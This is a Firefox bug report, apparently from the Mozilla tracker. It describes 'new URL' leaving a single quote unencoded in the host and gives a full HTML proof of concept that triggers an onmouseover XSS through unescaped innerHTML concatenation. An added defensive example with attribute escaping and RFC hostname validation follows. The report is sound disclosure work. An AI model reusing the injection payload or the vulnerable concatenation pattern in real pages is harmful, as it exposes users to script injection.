BUG
============
Improper validation of URL causes major security issue

TESTED VERSION
===============
Tested in the Firefox browser on Windows and Linux, 118.0.1

DETAILS
===============
Firefox has a built-in URL parser, "new URL". But it does not properly escape/encode the single quote (') in the URL host part. So this causes various security vulnerabilities. Try the command below and see the result:

```
new URL("http://example.com'/")
```

Result:

```
URL { href: "http://example.com'/", origin: "http://example.com'", protocol: "http:", username: "", password: "", host: "example.com'", hostname: "example.com'", port: "", pathname: "/", search: "" }
```

Here, see that the provided malicious URL is http://example.com'/ and new URL() does not escape/encode the single quote (') in this URL's href, hostname and origin parts.

**Here I found the RFC. A host can only contain dots, alphanumerics and "-".
https://www.rfc-editor.org/rfc/rfc3986.html page 20
https://datatracker.ietf.org/doc/html/rfc1738 page 5

```
defined in Section 3.5 of [RFC1034] and Section 2.1 of [RFC1123]. Such a name consists of a sequence of domain labels separated by ".", each domain label starting and ending with an alphanumeric character and possibly also containing "-" characters. The rightmost domain label of a fully qualified domain name in DNS may be followed by a single "." and should be if it is necessary to distinguish between the complete domain name and some local domain.
```

**I just checked all the modern browsers like Chrome, Microsoft Edge, Opera, Brave, Vivaldi, Safari and Yandex; they properly filter this payload. They URL-encode the single quotes (') present in the host part. Firefox is the only exception.
Here is sample code to make an XSS attack:

```html
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
<style>
</style>
</head>
<body>
<div id="aaa"></div>
<script>
// The host part of this URL carries a single quote, which new URL() leaves unencoded.
var u = new URL("http://example.com'/onmouseover=alert();//");
// The unencoded quote closes the single-quoted href attribute early.
var hh = "<a href='" + u.href + "'>sddsf</a>";
document.getElementById("aaa").innerHTML = hh;
</script>
</body>
</html>
```

Host this page, open it in the browser and mouse over the link to execute the XSS. This is happening only because of the single quote present in the host part: this single quote (') breaks the HTML context. You should also URL-encode the single-quote character present in the host part, just like all the other modern web browsers do.
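The following is an added example from an editorial, defensive point of view; it is not part of the reporter's comment and not Firefox code. It shows the two checks a page author can apply regardless of how the browser parses the host: attribute-escape any URL component before concatenating it into markup, and, where only DNS hostnames are acceptable, validate the host against the RFC 1034/1123 label syntax quoted above. The function names (`escapeHtmlAttr`, `isRfc1123Hostname`, `safeAnchorHtml`, `demo`) and the sample payload are my own constructions; the code runs in Node without a DOM, so it produces the markup as a string rather than inserting it.

```javascript
// Added defensive example (not the reporter's code): treat URL components as
// untrusted data whenever they reach an HTML attribute context.

// Escape the characters that can terminate or alter an HTML attribute value
// or element context. Covers single- and double-quoted attributes alike.
function escapeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Strict hostname check following the RFC 1034 / RFC 1123 label syntax the
// report quotes: labels of letters, digits and '-', not starting or ending
// with '-', separated by '.', with an optional trailing '.'. Anything else,
// including the apostrophe from the report, is rejected. IP literals and
// internationalised names are out of scope for this check.
function isRfc1123Hostname(host) {
  if (typeof host !== 'string' || host.length === 0 || host.length > 253) return false;
  const stripped = host.endsWith('.') ? host.slice(0, -1) : host;
  if (stripped.length === 0) return false;
  const label = /^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/;
  return stripped.split('.').every((l) => label.test(l));
}

// Build anchor markup from an href that may contain attacker-controlled
// characters. Because the href is escaped, a quote inside the host cannot
// close the attribute and smuggle in a new one such as an event handler.
// In a real page, prefer document.createElement('a') plus the .href property,
// which needs no string escaping at all.
function safeAnchorHtml(href, text) {
  return `<a href="${escapeHtmlAttr(href)}">${escapeHtmlAttr(text)}</a>`;
}

// Constructed sample input mirroring the shape of the report's payload.
const SAMPLE_HREF = "http://example.com'/path";

// Returns the hardened markup and the two hostname verdicts so they can be inspected.
function demo() {
  return {
    safe: safeAnchorHtml(SAMPLE_HREF, 'link'),
    hostOk: isRfc1123Hostname('example.com'),
    hostBad: isRfc1123Hostname("example.com'"),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The escaping step is the one that actually closes the hole in the PoC: even a parser that leaves the quote untouched cannot break out of an attribute whose value has been escaped. The hostname check is a secondary, input-validation layer for the case where only DNS names are expected at all.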
Bug 1858119 Comment 0 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.